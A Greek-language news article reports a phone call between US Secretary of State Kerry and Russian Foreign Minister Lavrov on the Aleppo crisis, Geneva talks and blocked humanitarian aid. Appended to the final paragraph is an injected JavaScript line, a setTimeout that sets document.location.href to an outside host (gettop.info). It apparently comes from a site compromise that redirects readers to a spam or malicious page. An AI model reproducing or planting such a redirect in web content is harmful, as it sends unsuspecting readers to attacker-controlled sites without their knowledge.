Τηλεφωνική επικοινωνία Κέρι – Λαβρόφ για τη Συρία

0
5

 

Τηλεφωνική επικοινωνία είχαν οι υπουργοί των Εξωτερικών Ρωσίας Σεργκέι Λαβρόφ και ΗΠΑ Τζον Κέρι για την κατάσταση στη Συρία. Οι δύο ΥΠΕΞ συμφώνησαν πως οι ειδικοί διάφορων χωρών θα συνεχίσουν να διερευνούν τρόπους να λυθεί η κρίση στο Χαλέπι, κατά τις συναντήσεις τους στη Γενεύη.

Σύμφωνα με δήλωση του ρωσικού υπουργείου, τονίστηκε ότι οι δύο πλευρές «συμφώνησαν να συνεχίσουν να διερευνούν τρόπους να λυθεί η κατάσταση στο Χαλέπι σ’ αυτή τη βάση μέσω ειδικών» καθώς και πως οι ΗΠΑ πρέπει να εκπληρώσουν τις υποχρεώσεις τους να διαχωρίσουν τις ομάδες της μετριοπαθούς αντιπολίτευσης από αυτές των τρομοκρατών.

Το γεγονός ότι οι μετριοπαθείς Σύροι αντάρτες και οι ομάδες που αντιμετωπίζονται ως τρομοκράτες από τη Ρωσία βρίσκονται σε μικρή γεωγραφική απόσταση μεταξύ τους ήταν ένας από τους παράγοντες αποτυχίας της εκεχειρίας που συμφωνήθηκε τον περασμένο μήνα μεταξύ της Μόσχας και της Ουάσιγκτον.

Από την πλευρά των ΗΠΑ, ο εκπρόσωπος του Στέιτ Ντιπάρτμεντ Τζον Κίρμπι είπε ότι οι δύο υπουργοί «συζήτησαν τη σημασία των συνεχιζόμενων πολυμερών διαβουλεύσεων στη Γενεύη και πώς να φτάσουν σε μια κατάπαυση εχθροτήτων που να έχει νόημα, και για την παράδοση ανθρωπιστικού υλικού«. Η ανθρωπιστική βοήθεια δεν έχει φτάσει στον άμαχο πληθυσμό που πολιορκείται στο Χαλέπι παρά την παύση των εχθροπραξιών, σημείωσε.

Ο Κέρι εξέφρασε την ανησυχία του για την ανανέωση των επιθέσεων από αέρος και εδάφους στο Χαλέπι από συριακές κυβερνητικές δυνάμεις και τους Ρώσους υποστηρικτές των, μετά από μια παύση εχθροπραξιών που κράτησε αρκετές μέρες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here